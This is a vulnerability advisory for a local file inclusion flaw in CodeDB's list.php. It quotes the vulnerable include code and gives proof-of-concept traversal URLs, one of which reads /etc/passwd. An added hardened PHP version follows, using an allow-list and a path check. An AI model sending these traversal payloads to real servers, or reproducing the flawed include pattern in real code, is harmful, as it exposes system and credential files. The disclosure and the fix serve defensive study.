CodeDB (list.php lang) Local File Inclusion Vulnerability

###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

// list.php

$lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol

if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
    include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt

http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd

http://[host]/[codeDB_path]/list.php?lang=../[local_file]

EoF.
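
A hardened form of the include logic shown under "Source", as an added example that is not part of the original advisory or of CodeDB's own code. htmlspecialchars() only encodes HTML metacharacters, so "../" passes through unchanged; here the request value merely selects from a fixed allow-list and the resolved path is checked to stay under templates/. The language codes, the constants and the function name resolve_template() are assumptions made for illustration.

```php
<?php
// Added example (PHP 7.1+): hardened replacement for the include in list.php.
// Hypothetical names, not from CodeDB: TEMPLATE_DIR, DEFAULT_LANG,
// ALLOWED_LANGS, resolve_template().

const TEMPLATE_DIR  = __DIR__ . '/templates';
const DEFAULT_LANG  = 'en';
const ALLOWED_LANGS = ['en', 'pl', 'de'];   // constructed sample values

/**
 * Map a user-supplied language code to a template file.
 * Returns the canonical path, or null if the value must be rejected.
 */
function resolve_template($lang, string $baseDir = TEMPLATE_DIR): ?string
{
    // 1. Allow-list: the parameter only picks one of the known names.
    //    Strict comparison also rejects arrays (?lang[]=x) and numbers.
    if (!is_string($lang) || !in_array($lang, ALLOWED_LANGS, true)) {
        return null;
    }

    // 2. Defence in depth: canonicalise both paths and confirm the
    //    template is really inside the template directory. The appended
    //    "_middle.php" suffix is not treated as a safeguard.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $lang . '_middle.php');
    if ($base === false || $path === false) {
        return null;                        // directory or file missing
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;                        // resolved outside templates/
    }
    return $path;
}

// Fall back to the default language instead of echoing the bad value back.
$template = resolve_template($_GET['lang'] ?? DEFAULT_LANG)
    ?? resolve_template(DEFAULT_LANG);

if ($template !== null) {
    include $template;
} else {
    http_response_code(404);
}
```

Logging rejected lang values (anything containing "/" or "..") gives a cheap detection signal for probing of this parameter.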
